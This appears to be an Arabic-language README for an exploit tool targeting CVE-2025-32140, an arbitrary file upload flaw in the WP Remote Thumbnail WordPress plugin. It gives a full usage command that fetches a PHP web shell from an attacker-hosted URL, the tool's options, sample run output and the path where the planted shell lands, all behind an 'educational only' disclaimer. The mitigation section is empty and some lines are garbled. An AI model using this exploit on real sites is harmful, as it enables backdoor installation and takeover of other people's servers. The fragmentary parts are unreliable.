
المكوّن الإضافي WordPress WP Remote Thumbnail Plugin <= 1.3.2 معرّض لثغرة رفع ملفات تعسفي
CVE-2025-32140 هو ثغرة حرجة في إضافة WP Remote Thumbnail الخاصة بووردبريس. تتيح هذه الثغرة للمهاجمين المُوثَّقين (بصلاحيات مساهم أو أعلى) رفع ملفات تعسّفية، مثل قشور الويب (web shells)، عبر إساءة استخدام ميزة معيبة تقبل عناوين URL غير مُنقّاة.
لا تتحقق الإضافة من نوع الملف أو محتواه الذي يتم جلبه من رابط remote_thumb المقدَّم، مما يسمح للمهاجمين بحفظ ملفات PHP خبيثة (مثل الأبواب الخلفية) في مجلد /wp-content/uploads.
edit_post)يعمل هذا السكربت المكتوب بلغة بايثون على أتمتة استغلال CVE-2025-32140 عبر الخطوات التالية:
remote_thumb.python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
بمجرد استغلال الثغرة، من المرجح أن يتم تخزين قشرة الويب المرفوعة في:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
استبدل YYYY/MM بـ السنة والشهر الحاليين لتاريخ رفع الملف.
لتخفيف المخاطر الناتجة عن هذه الثغرة:
هذا السكربت مقدَّم لأغراض تعليمية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال.
بواسطة: Nxploited ( Khaled Alenazi ) 🌟
| الخيار | الاسم المستعار | الوصف |
|---|
--url | -u | رابط موقع ووردبريس المستهدف (مثل http://target.com/wordpress) |
--username | -un | اسم مستخدم ووردبريس بصلاحيات تحرير المقالات |
--password | -p | كلمة المرور لاسم المستخدم المحدد |
--user_ID | -uid | معرف مستخدم ووردبريس (غالبًا 1 للمدير) |
--post_ID | -pid | معرف المقال الذي سيتم تحريره (يمكن أن يكون مسودة) |
--shell | رابط مباشر لقشرة ويب PHP مستضافة على خادم المهاجم |